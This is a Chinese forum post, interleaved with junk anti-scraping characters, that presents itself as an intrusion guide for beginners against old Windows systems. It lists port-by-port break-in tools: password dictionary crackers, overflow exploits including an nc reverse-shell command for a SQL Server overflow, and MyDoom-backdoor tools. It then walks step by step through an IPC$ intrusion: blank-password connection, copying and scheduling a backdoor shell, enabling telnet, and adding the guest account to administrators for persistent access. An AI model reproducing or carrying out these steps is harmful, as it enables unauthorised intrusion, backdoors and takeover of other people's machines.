TA的每日心情 | 衰 2019-8-18 09:37 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu$ U4 N1 h* ^' ~9 d) B
希望对新手入侵有帮助!
7 H4 G! N% u7 y8 O 1. 1433端口入侵
! x( k* ^$ X8 F9 y1 \; v scanport.exe 查有1433的机器! j" R+ }% Q& h( o
SQLScanPass.exe 进行字典暴破(字典是关键)
) k8 S5 m/ v' l# C& m& n. ^ 最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。6 X( m" m! W! L4 c
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
' }% d& q5 L* ~9 ~4 ]+ e (以上反向的,测试成功)3 v5 v% v2 |- u4 f7 Y b
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)( H, X3 e" t; [9 |3 [
2. 4899端口入侵3 @ B. ?7 W0 ^/ T
用4899过滤器.exe,扫描空口令的机器
. f7 m9 ^& P% e' s- T 3. 3899的入侵
$ t* H7 f( n4 d$ m9 E/ m! }+ l6 M 对很早的机器,可以试试3389的溢出(win3389ex.exe)
. W/ t O7 n. B 对2000的机器,可以试试字典暴破。(tscrack.exe)
8 P9 \5 Y3 K# t4 a" o& U4 p 4. 80入侵
; R2 G9 k1 O0 @ \. \ 对sp3以前的机器,可以用webdav入侵;3 C- q& u, }1 t1 ?
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
+ ?& @0 R1 P. X 可以利用SQL进行注入。(啊D的注入软件)。
' m( @- V/ e9 B% V+ A; V- v 5. serv-u入侵(21端口)& P( \: \& J$ R2 |
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)* G/ X( W+ e* R, y
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
7 @: F8 Y& ^: b! W; w" p7 p 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) n( I4 X/ B. z5 _4 q
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
. v+ \2 j. D8 q9 O; c4 m 6. 554端口
" S N5 `1 \) Q) G/ u 用real554.exe入侵。
5 x8 f- ]) `, M, R! V1 } 7. 6129端口* k6 H9 r# {: x% @
用DameWare6129.exe入侵。
, M, `' }. d' k$ J 8. 系统漏洞- _! K4 p* f% ]4 T$ W
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
. b% C8 r& W2 B. t7 {+ v9. 3127等端口) f# l( P' x1 j8 C& v
4 T# q5 g+ M1 K1 ~) d/ N+ { P' c
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。8 K1 b; v! o4 X" e) x1 b j
10. 其他入侵& N$ z) O7 ?6 f- @
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。$ C I1 f7 D% v& `4 a
8 B9 g/ a3 a0 z+ p; g 经典IPC$入侵
- E( S7 d# x% r+ u2 A! U) h( v, I. H+ j$ ?) O9 i; i
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"- Z' [; y8 g" E* c+ U& B) f% o4 Q
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2 b) t- `+ y6 V, w 2. C:\>copy srv.exe $">\\127.0.0.1\admin$
/ F M" B# R i# u 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
: w3 ~3 A2 H) W* f1 \- w2 q 3. C:\>net time file://127.0.0.1/
" D4 R5 `7 ^# j 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。' B+ i# D* h5 @/ y8 U8 }1 t R, i7 ?; p
4. C:\>at file://127.0.0.1/ 11:05 srv.exe! ?' U K% E0 z, R8 { A* `
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.) ]5 [1 p8 X5 P! k. W1 Q' B
5. C:\>net time file://127.0.0.1/
) B! A" V0 i9 M8 ~# G: M i0 m; j 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。& l! w- [) Y2 b9 u* W# s
6. C:\>telnet 127.0.0.1 99
4 {# `2 a6 {4 C, ~/ u: R! @ 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
, R# X3 R w; y2 S- G% u" E 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
- N0 d9 I3 H1 b 7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$9 ?9 B: \8 S1 a$ H
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
) r. T' N2 r# Y$ I( L7 i 8. C:\WINNT\system32>ntlm
* Z6 A* { g) ~2 q8 Z7 Y! P 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!* Q3 O+ c6 V' e7 p2 ? D9 p, l
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组* s( m% K/ A Q0 D( c( Q
10. C:\>net user guest /active:yes* E6 _8 A- M2 V6 Z2 o2 e0 s) d
将对方的Guest用户激活
V5 @& i/ R: }9 b0 E 11. C:\>net user guest 1234
9 ~' ]1 H4 k! g& Q2 X9 h" b 将Guest的密码改为1234,或者你要设定的密码
3 v1 k) |. i/ H 12. C:\>net localgroup administrators guest /add% @3 S, ]3 |- @8 ~' V7 c+ S
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|